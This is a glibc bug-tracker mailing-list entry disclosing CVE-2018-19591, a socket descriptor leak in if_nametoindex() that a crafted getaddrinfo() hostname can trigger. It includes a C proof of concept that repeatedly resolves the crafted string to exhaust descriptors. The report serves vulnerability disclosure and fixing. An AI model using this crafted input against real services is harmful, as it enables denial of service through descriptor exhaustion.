This is the mail archive of the
glibc-bugs@sourceware.org
mailing list for the glibc project.
[Bug network/23927] New: Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
- From: "guidovranken at gmail dot com" <sourceware-bugzilla at sourceware dot org>
- To: glibc-bugs at sourceware dot org
- Date: Tue, 27 Nov 2018 09:24:54 +0000
- Subject: [Bug network/23927] New: Linux if_nametoindex() does not close descriptor (CVE-2018-19591)
- Auto-submitted: auto-generated
https://sourceware.org/bugzilla/show_bug.cgi?id=23927
Bug ID: 23927
Summary: Linux if_nametoindex() does not close descriptor
(CVE-2018-19591)
Product: glibc
Version: 2.28
Status: UNCONFIRMED
Severity: normal
Priority: P2
Component: network
Assignee: unassigned at sourceware dot org
Reporter: guidovranken at gmail dot com
Target Milestone: ---
In sysdeps/unix/sysv/linux/if_index.c, __if_nametoindex() creates a socket
descriptor but does not close it if the 'ifname' parameter is too long. This is
a resource leak (CWE-404).
Additionally, it is possible to call getaddrinfo() with a crafted 'node'
parameter, that leads to the offending code in __if_nametoindex().
In short, untrusted hostname resolutions (via getaddrinfo()) lead to descriptor
exhaustion.
MITRE has assigned CVE-2018-19591 for this issue.
Attribution: Guido Vranken
A proof-of-concept follows:
#include <errno.h>
#include <net/if.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
static int detect_open_descriptors(void)
{
int i = 0;
int fd_count = 0;
int max_fd_number = 0;
struct stat stats;
max_fd_number = getdtablesize();
struct rlimit rlimits;
getrlimit(RLIMIT_NOFILE, &rlimits);
for ( i = 0; i <= max_fd_number; i++ ) {
fstat(i, &stats);
if ( errno != EBADF ) { fd_count++; }
}
return fd_count;
}
int main(void)
{
struct addrinfo hints, *res;
void *ptr;
memset (&hints, 0, sizeof (hints));
hints.ai_socktype = SOCK_STREAM;
printf("Open file descriptors before call to getaddrinfo: %d\n",
detect_open_descriptors());
for (int i = 0; i < 1500; i++) {
getaddrinfo("FEA0::%AAAAAAAAAAAAAAAA", NULL, &hints, &res);
printf("Open file descriptors after call to getaddrinfo: %d\n",
detect_open_descriptors());
}
return 0;
}
--
You are receiving this mail because:
You are on the CC list for the bug.